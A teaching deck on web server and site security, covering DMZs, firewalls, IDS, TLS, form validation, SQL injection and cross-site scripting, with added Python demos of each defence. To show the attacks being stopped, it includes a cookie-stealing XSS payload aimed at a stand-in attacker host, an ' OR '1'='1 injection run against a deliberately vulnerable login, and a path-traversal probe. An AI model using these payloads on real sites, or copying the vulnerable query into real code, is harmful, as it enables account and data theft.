Web Server Web Site Security

Published in: Technology

Web Server Security

Demilitarised Zones

  • A DMZ is a network segment that sits between an internal network and an external network (generally the Internet).
  • The point of a DMZ is that connections from the internal network and from the external network into the DMZ are permitted, whereas connections originating in the DMZ are permitted only towards the external network: hosts in the DMZ may not open connections into the internal network, so a compromised DMZ host gives an attacker no direct path to internal systems.
DMZ and Web Servers

  • Web servers may need to communicate with an internal database to provide some specialised services.
  • Since the database server is not publicly accessible and may contain sensitive information, it should not be in the DMZ.
  • Generally, it is not a good idea to allow the web server to communicate directly with the internal database server: if the web server is compromised, the attacker holds the database credentials and has a network path to the data.
  • Instead, an application server can be used as an intermediary between the web server and the database server, so the firewall only has to open a single, narrow path from the web server to the application server rather than to the database itself.
Firewalls

  • A firewall is a piece of hardware or software which functions in a networked environment to block communications forbidden by the security policy.
  • Firewalls filter traffic coming from the Internet into your private network or computer system. If an incoming packet is flagged by the firewall's filters, it is not allowed through.
  • Firewalls use one or more of three methods to control traffic flowing in and out of a network.

Packet filtering

  • Permits or denies network traffic based on the source address, destination address, service (port) or protocol of each packet, with every packet examined in isolation.

Proxy Service

  • Information from the Internet is retrieved by the firewall on behalf of the requesting system and then relayed to it, and vice versa, so internal hosts never talk to the outside directly and the proxy can inspect the application-layer content.

Stateful Inspection

  • Keeps a table of the connections that have been legitimately established through the firewall (for example, a TCP handshake initiated from the inside).
  • Information travelling from inside the firewall to the outside is recorded in this table; incoming packets are then compared against it.
  • If an incoming packet belongs to a known connection it is allowed through; an unsolicited packet that merely looks like a reply is discarded.

What a firewall protects you from

  • Remote login
  • Application backdoors
  • Operating system bugs
  • Denial of service
  • E-mail bombs
  • Viruses
  • Spam
  • Redirect bombs
  • Source routing

Note that the last few items need application-layer inspection: a packet filter that only looks at addresses and ports cannot recognise a virus or spam inside an otherwise permitted mail or web connection, so that protection comes from a proxy or mail gateway rather than from port-based rules.
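The DMZ policy and the firewall methods above, combined in one added example that is not code from the slides: a toy zone-based packet filter in Python that applies first-match stateless rules and keeps a connection table for stateful inspection. The addresses, ports, zone layout and the single web-to-application-server exception are assumptions chosen for illustration, and the traffic it evaluates is constructed.

```python
"""Added example (not from the slides): a toy zone-based, stateful packet
filter that enforces the DMZ policy described above.

Addresses and ports are assumptions chosen for illustration:
  internal  10.0.0.0/8     workstations, application server 10.0.0.30, database 10.0.0.20
  dmz       192.0.2.0/24   public web server 192.0.2.10
  external  everything else (the Internet)
"""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import List, Optional, Set, Tuple

ZONES = {"internal": ip_network("10.0.0.0/8"), "dmz": ip_network("192.0.2.0/24")}
APP_SERVER = "10.0.0.30"  # assumed address of the application-server tier


def zone_of(addr: str) -> str:
    """Map an IP address to its security zone; unknown addresses are the Internet."""
    ip = ip_address(addr)
    for name, net in ZONES.items():
        if ip in net:
            return name
    return "external"


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = True  # True = new TCP connection attempt, False = later segment of a flow


# Stateless rules: (src_zone, dst_zone, allowed dst ports or None, required dst host or None).
# First match wins; anything unmatched is dropped (default deny).
RULES: List[Tuple[str, str, Optional[Set[int]], Optional[str]]] = [
    ("external", "dmz", {80, 443}, None),      # Internet -> web server, HTTP/HTTPS only
    ("internal", "dmz", None, None),           # internal admins/tools -> DMZ
    ("dmz", "external", None, None),           # DMZ -> Internet (updates, outbound calls)
    ("dmz", "internal", {8080}, APP_SERVER),   # the one deliberate hole: web -> application server
    # No rule lets the DMZ reach the database (10.0.0.20) or the Internet reach the internal network.
]


@dataclass
class StatefulFilter:
    # Connection table of flows whose initial SYN was accepted: (client, cport, server, sport).
    flows: Set[Tuple[str, int, str, int]] = field(default_factory=set)

    def _rules_allow(self, p: Packet) -> bool:
        sz, dz = zone_of(p.src), zone_of(p.dst)
        for src_zone, dst_zone, ports, host in RULES:
            zone_ok = (sz, dz) == (src_zone, dst_zone)
            port_ok = ports is None or p.dport in ports
            host_ok = host is None or p.dst == host
            if zone_ok and port_ok and host_ok:
                return True
        return False

    def filter(self, p: Packet) -> str:
        """Return 'ALLOW' or 'DROP' for a single packet, updating connection state."""
        if p.syn:
            # New connection: only the stateless rules decide; an accepted SYN creates state.
            if self._rules_allow(p):
                self.flows.add((p.src, p.sport, p.dst, p.dport))
                return "ALLOW"
            return "DROP"
        # Non-SYN segment: accepted only if it belongs to a known flow, in either direction.
        forward = (p.src, p.sport, p.dst, p.dport)
        reply = (p.dst, p.dport, p.src, p.sport)
        if forward in self.flows or reply in self.flows:
            return "ALLOW"
        return "DROP"  # unsolicited packet, even if its ports look like a reply


def run_demo() -> List[str]:
    """Constructed traffic exercising the policy; returns the verdict for each packet."""
    fw = StatefulFilter()
    traffic = [
        Packet("203.0.113.5", 40000, "192.0.2.10", 443),             # Internet -> web HTTPS
        Packet("192.0.2.10", 443, "203.0.113.5", 40000, syn=False),  # web's reply (state)
        Packet("203.0.113.5", 40001, "192.0.2.10", 22),              # Internet -> web SSH
        Packet("203.0.113.5", 40002, "10.0.0.20", 3306),             # Internet -> database
        Packet("192.0.2.10", 50000, "10.0.0.20", 3306),              # web -> database directly
        Packet("192.0.2.10", 50001, "10.0.0.30", 8080),              # web -> application server
        Packet("10.0.0.5", 51000, "192.0.2.10", 22),                 # admin -> web SSH
        Packet("192.0.2.10", 22, "10.0.0.5", 51000, syn=False),      # web's SSH reply (state)
        Packet("192.0.2.10", 22, "10.0.0.5", 51000, syn=True),       # DMZ host opening into internal
        Packet("198.51.100.9", 443, "10.0.0.5", 51000, syn=False),   # forged "reply" with no flow
    ]
    return [fw.filter(p) for p in traffic]


if __name__ == "__main__":
    for verdict in run_demo():
        print(verdict)
```

Run it to print one verdict per packet. Two things the rules alone cannot express show up in the output: the web server's replies to the admin's SSH session are allowed although no dmz-to-internal rule exists for port 22, because the filter remembers the flow the admin opened, and a forged packet that merely looks like a reply from port 443 is dropped because no flow matches it.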
Intrusion Detection System

  • An Intrusion Detection System monitors network traffic and logs or notifies against any possibly malicious activity. A detection system only raises alerts for an operator to act on; an intrusion prevention system is the variant that also blocks the traffic.
  • An IDS is composed of several components:
      • Sensors, which generate security events from the traffic or logs they observe,
      • A console to monitor events and alerts and to control the sensors,
      • A central engine that records the events logged by the sensors in a database and uses a system of rules to generate alerts from the security events received.
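The three IDS components above as an added example (not code from the slides), in Python: a sensor that turns web server access-log lines into events, an engine that applies signature rules and one stateful threshold rule, and a console that collects the alerts. The log lines, the log format and the rules are constructed for illustration.

```python
"""Added example (not from the slides): a minimal IDS pipeline with the three
components named above.  The access-log lines and the rules are constructed."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample of "combined"-style web server access-log lines.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/view.cgi?file=../../../../etc/passwd HTTP/1.1" 404 512
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /product.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 8192
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "POST /login.php HTTP/1.1" 401 212
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "POST /login.php HTTP/1.1" 401 212
198.51.100.4 - - [10/Oct/2023:13:56:03 +0000] "POST /login.php HTTP/1.1" 401 212
198.51.100.4 - - [10/Oct/2023:13:56:04 +0000] "POST /login.php HTTP/1.1" 401 212
198.51.100.4 - - [10/Oct/2023:13:56:05 +0000] "POST /login.php HTTP/1.1" 401 212
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /about.html HTTP/1.1" 200 770
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)


@dataclass(frozen=True)
class Event:
    ip: str
    method: str
    path: str     # URL-decoded so that percent-encoded payloads cannot hide from the rules
    status: int


@dataclass(frozen=True)
class Alert:
    rule: str
    ip: str
    detail: str


def sensor(log_text: str) -> List[Event]:
    """Sensor: turn raw log lines into security events; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(Event(m["ip"], m["method"], unquote(m["path"]), int(m["status"])))
    return events


class Engine:
    """Engine: signature rules on each event plus one stateful threshold rule."""
    SIGNATURES = {
        "path-traversal": re.compile(r"\.\./"),
        "sql-injection": re.compile(r"'\s*(or|and)\s*'?\w*'?\s*=", re.IGNORECASE),
    }
    LOGIN_FAIL_THRESHOLD = 5  # failed logins from one IP before alerting

    def __init__(self) -> None:
        self.failed_logins: Dict[str, int] = defaultdict(int)

    def process(self, ev: Event) -> List[Alert]:
        alerts = []
        for name, pattern in self.SIGNATURES.items():
            if pattern.search(ev.path):
                alerts.append(Alert(name, ev.ip, ev.path))
        if ev.path.startswith("/login") and ev.status == 401:
            self.failed_logins[ev.ip] += 1
            if self.failed_logins[ev.ip] == self.LOGIN_FAIL_THRESHOLD:
                alerts.append(Alert("login-brute-force", ev.ip,
                                    f"{self.LOGIN_FAIL_THRESHOLD} failed logins"))
        return alerts


def console(log_text: str) -> List[Alert]:
    """Console view: run the whole pipeline and return the alerts an operator would see."""
    engine = Engine()
    alerts = []
    for ev in sensor(log_text):
        alerts.extend(engine.process(ev))
    return alerts


if __name__ == "__main__":
    for a in console(SAMPLE_LOG):
        print(f"{a.rule:20} {a.ip:15} {a.detail}")
```

The sensor decodes the request path before matching, which is why the percent-encoded `' OR '1'='1` probe still trips the SQL-injection signature; the brute-force rule needs state across events, which is why it lives in the engine rather than in a per-line pattern.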
Web Security Protocols

Secure Sockets Layer

  • Secure Sockets Layer (SSL) provides confidentiality and integrity for the traffic between a client and the Web server, and authenticates the server to the client, so that communications containing sensitive data such as passwords or credit card information are protected in transit.
  • SSL uses public-key cryptography (the server's certificate) to authenticate the server and agree a session key, and then encrypts the data with that key before it is transmitted. SSL itself is obsolete; its successor, Transport Layer Security (TLS), is what "SSL" means in practice today, and SSL 2.0 and 3.0 should be disabled on servers.

Secure HTTP

  • If you have used the Web, you have probably noticed that URLs for most Web pages begin with the http prefix, which indicates that the request will be sent over TCP to port 80 (by default) using the HTTP protocol.
  • When Web page URLs begin with the prefix https, they require that their data be transferred from server to client and vice versa inside an SSL/TLS connection.
  • HTTPS uses TCP port 443 by default, rather than port 80.
  • Once an SSL/TLS connection has been established between a Web server and client, the client's browser indicates this with a padlock icon (historically in the status bar, in current browsers next to the address). The padlock means the certificate was validated for the hostname in the URL and the connection is encrypted; it says nothing about whether the site itself is trustworthy.
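The client side of the HTTPS connection described above, as an added example that is not code from the slides: Python's ssl module configured to do what the browser's padlock implies (verify the certificate chain, check it against the hostname, refuse SSL and early TLS), plus the scheme-to-port mapping. The host in the usage line is an example; only `fetch_head` needs network access.

```python
"""Added example (not from the slides): a hardened HTTPS client context and the
http/https port defaults.  The example hostname is an assumption."""
import socket
import ssl
from typing import Tuple
from urllib.parse import urlsplit


def connect_params(url: str) -> Tuple[str, int, bool]:
    """Return (host, port, use_tls) for a URL: 80 for http and 443 for https unless overridden."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"unsupported scheme: {parts.scheme!r}")
    use_tls = parts.scheme == "https"
    port = parts.port if parts.port is not None else (443 if use_tls else 80)
    return parts.hostname, port, use_tls


def client_context() -> ssl.SSLContext:
    """Client context that verifies the server certificate against the system trust
    store, checks it against the hostname, and requires TLS 1.2 or newer."""
    ctx = ssl.create_default_context()            # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # SSLv3, TLS 1.0 and TLS 1.1 are rejected
    return ctx


def context_settings() -> Tuple[bool, str, str]:
    """What the context enforces, as plain values, so the configuration can be checked."""
    ctx = client_context()
    return ctx.check_hostname, ctx.verify_mode.name, ctx.minimum_version.name


def fetch_head(url: str, timeout: float = 5.0) -> bytes:
    """Open the connection (TLS-wrapped for https), send a HEAD request, return the status line.
    A certificate that does not validate for the hostname raises ssl.SSLCertVerificationError."""
    host, port, use_tls = connect_params(url)
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        # server_hostname sends SNI and is the name the certificate is checked against
        sock = client_context().wrap_socket(sock, server_hostname=host)
    try:
        sock.sendall(f"HEAD / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode())
        return sock.recv(4096).split(b"\r\n", 1)[0]
    finally:
        sock.close()


if __name__ == "__main__":
    print(context_settings())
    print(fetch_head("https://example.com/"))  # needs network access
```

The hostname check is the part that turns "encrypted" into "encrypted to the server named in the URL"; a context with `check_hostname` switched off still encrypts, but any certificate the client trusts would be accepted for any name.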
Web Site Security

Common Gateway Interface

What is a Common Gateway Interface?

  • The Common Gateway Interface (CGI) is a standard protocol for interfacing external application software with an information server, commonly a Web server: the server runs the CGI program as a separate process and hands it the request (query string, headers, POST body) through environment variables and standard input, so every input the program reads is attacker-controlled.

"CGI scripts are essential software programs. CGI scripts link servers and software, and servers and other resources such as databases. These scripts are themselves small servers and this can create problems in making information too available. The problem with CGI scripts is that each one creates opportunities for exploitable bugs. Therefore, it is essential that business organisations ensure the security of not only servers but also the CGI scripts that link their servers to other resources used in the business."
(Lawrence, E., et al., 2003)
Web Form Validation

Why we need to validate?

  • When working with web forms, often you will have the data being placed into a database of some form.
  • You want to ensure that the correct data is going into the fields set in the tables.
  • You don't want letters or other non-numeric characters going into fields that require numeric characters only.
  • Some fields might require specific information to be entered in a specific format, for example email addresses.
  • You will want your email addresses to be validated correctly, and that is based on the user@domain standard.

  • Web form validation can take place on two fronts: client side and server side.
  • Client-side validation will often be done with JavaScript, whilst server-side validation would be performed with a server-side language such as PHP or ASP.
  • Client-side validation only improves the user's experience; anyone can disable JavaScript or send the request directly with a tool, so every check must be repeated on the server, which is the only place the application can trust.
  • There are other reasons you would validate your web forms, and that is due to vulnerabilities.
  • One such vulnerability which can leave you open to attack is SQL injection.
SQL Injection

What is SQL Injection?

  • SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application.
  • The vulnerability is present when user input is either incorrectly filtered for string-literal escape characters embedded in SQL statements, or is not strongly typed, and is thereby unexpectedly executed as part of the query.
  • It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
  • Input validation narrows the attack surface, but the reliable defence is to keep user input out of the query text altogether by passing it as bound parameters (prepared statements), so that the database receives the statement structure and the values separately.
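Server-side validation (the section before this one) and the injection itself, in one added example that is not code from the slides. The slides use PHP; this is a Python equivalent. The form fields, the table, its rows and the attacker's input are constructed for illustration, and the vulnerable function is kept deliberately vulnerable only so that the effect of the payload is visible beside the parameterised fix.

```python
"""Added example (not from the slides): server-side form validation, then the
database step with the injection the slides warn about and its fix.  Table,
rows and inputs are constructed."""
import re
import sqlite3
from typing import Dict, List, Tuple

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_order_form(form: Dict[str, str]) -> Tuple[Dict[str, object], List[str]]:
    """Check each field against the type/format its database column expects.
    Returns (cleaned values, error messages).  Runs on the server: the browser is not trusted."""
    cleaned: Dict[str, object] = {}
    errors: List[str] = []

    qty = form.get("quantity", "").strip()
    if not qty.isdigit() or not 1 <= int(qty) <= 999:   # numeric column: digits only, sane range
        errors.append("quantity must be a whole number between 1 and 999")
    else:
        cleaned["quantity"] = int(qty)

    email = form.get("email", "").strip()
    if len(email) > 254 or not EMAIL_RE.match(email):     # user@domain form
        errors.append("email must look like user@domain")
    else:
        cleaned["email"] = email.lower()

    name = form.get("yourname", "").strip()
    if not 1 <= len(name) <= 60:
        errors.append("name must be 1-60 characters")
    else:
        cleaned["yourname"] = name
    return cleaned, errors


def build_db() -> sqlite3.Connection:
    """In-memory table standing in for the site's user database (constructed data).
    Passwords are plaintext only to keep the injection visible; real systems store hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    db.executemany("INSERT INTO users (email, password) VALUES (?, ?)",
                   [("alice@example.com", "s3cret"), ("bob@example.com", "hunter2")])
    return db


def login_vulnerable(db: sqlite3.Connection, email: str, password: str) -> List[str]:
    """The bug the slides describe: user input spliced into the SQL string.
    Deliberately vulnerable; a quote in the input rewrites the WHERE clause."""
    sql = f"SELECT email FROM users WHERE email = '{email}' AND password = '{password}'"
    return [row[0] for row in db.execute(sql)]


def login_safe(db: sqlite3.Connection, email: str, password: str) -> List[str]:
    """The fix: bound parameters.  The driver sends the values separately from the
    query text, so a quote in the input can never change the statement's structure."""
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (email, password))]


def demo() -> Tuple[List[str], List[str]]:
    """Run the classic  ' OR '1'='1  payload through both versions."""
    db = build_db()
    payload = "' OR '1'='1"
    return login_vulnerable(db, payload, payload), login_safe(db, payload, payload)


if __name__ == "__main__":
    print(validate_order_form({"quantity": "5a", "email": "bob", "yourname": ""}))
    vulnerable, safe = demo()
    print("vulnerable query returned:", vulnerable)  # every user, no password needed
    print("parameterised query returned:", safe)     # nothing
```

With the payload in both fields the concatenated statement becomes `WHERE email = '' OR '1'='1' AND password = '' OR '1'='1'`, which is true for every row, so the vulnerable login returns all users; the parameterised version compares the literal string `' OR '1'='1` to the email column and matches nothing.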
Cross-Site Scripting

What is Cross-Site Scripting?

  • You have to be careful when you display data entered by a user on a web page, because malicious users can include HTML tags and JavaScript in their input in an attempt to trick other users who view that information into doing something they might not want to do, such as entering their password to your site and submitting it to another site. Because the injected script runs in the victim's browser with the same origin as your site, it can also read the victim's session cookie and send it elsewhere.

Preventing Cross-Site Scripting

  • In order to prevent malicious users from doing that sort of thing, PHP includes the htmlspecialchars() function, which encodes the special characters in a string (&, <, > and the quote characters) so that they are displayed on the page rather than letting the browser treat them as markup.
  • Or, if you prefer, you can use htmlentities(), which encodes all of the characters that are encoded by htmlspecialchars() plus any other characters that can be represented as entities.
  • In the preceding example, you'd really want to write the script that displays the user's name like this:

    <p>Hello <?= htmlspecialchars($_POST['yourname']) ?> Thanks for visiting.</p>

  • That prevents the person who submitted the data from launching a successful cross-site scripting attack through this output. Note that before PHP 8.1 htmlspecialchars() leaves single quotes unencoded unless you pass the ENT_QUOTES flag, which matters when the value lands inside a single-quoted HTML attribute; from PHP 8.1 ENT_QUOTES is part of the default flags.
  • If you prefer, you can also use the strip_tags() function, which just removes all the HTML tags from a string. Stripping is weaker than encoding: it throws away legitimate input containing "<" and does nothing for input placed inside an attribute or a script block.
  • Finally, if your form is submitted using the POST method, you should refer to the parameters using $_POST rather than $_REQUEST, which also helps to avoid certain types of attacks by ignoring information appended to the URL via the query string (and, depending on configuration, in cookies) that could otherwise override the form's fields.
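The greeting above, as an added example that is not code from the slides, in Python: html.escape is the counterpart of htmlspecialchars() with ENT_QUOTES, and a regex tag stripper stands in for strip_tags(). It shows the attacker's name field rendered raw, rendered encoded, and placed inside an attribute, which is where quote encoding matters. The payloads and the extra profile-link template are constructed for illustration.

```python
"""Added example (not from the slides): the cross-site scripting case in Python.
html.escape plays the role of PHP's htmlspecialchars(); the payloads are constructed."""
import html
import re
from typing import Dict

TAG_RE = re.compile(r"<[^>]*>")

# Constructed attacker input: a form submission whose name field carries a script
PAYLOAD = {"yourname": "<script>document.location='https://evil.example/?c='+document.cookie</script>"}
# Constructed input aimed at an attribute context: no tags at all, just a quote and an event handler
ATTR_PAYLOAD = {"yourname": 'x" onmouseover="alert(1)'}


def strip_tags(s: str) -> str:
    """Counterpart of PHP's strip_tags(): removes markup, but leaves the script body
    behind as text and does nothing for attribute or script contexts."""
    return TAG_RE.sub("", s)


def render_greeting_unsafe(post: Dict[str, str]) -> str:
    """The bug: user input copied into the page verbatim, so the browser runs the script."""
    return f"<p>Hello {post['yourname']} Thanks for visiting.</p>"


def render_greeting(post: Dict[str, str]) -> str:
    """The fix from the slides: encode & < > and both quote characters (html.escape's
    default quote=True) so the browser shows the input as text."""
    return f"<p>Hello {html.escape(post['yourname'])} Thanks for visiting.</p>"


def render_profile_link(post: Dict[str, str]) -> str:
    """Attribute context: quoting the attribute AND encoding quotes is what stops an
    input such as  x" onmouseover="alert(1)  from adding an event handler."""
    return f'<a title="{html.escape(post["yourname"])}" href="/profile">profile</a>'


if __name__ == "__main__":
    print(render_greeting_unsafe(PAYLOAD))   # script tag reaches the browser
    print(render_greeting(PAYLOAD))          # &lt;script&gt; is displayed, not run
    print(render_profile_link(ATTR_PAYLOAD)) # &quot; keeps the input inside the title
    print(strip_tags(PAYLOAD["yourname"]))   # tags gone, JavaScript text still there
```

The attribute case is the one the slides' text-only example does not cover: the second payload contains no tag for strip_tags() to remove, and only encoding the quote character keeps it inside the title attribute.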
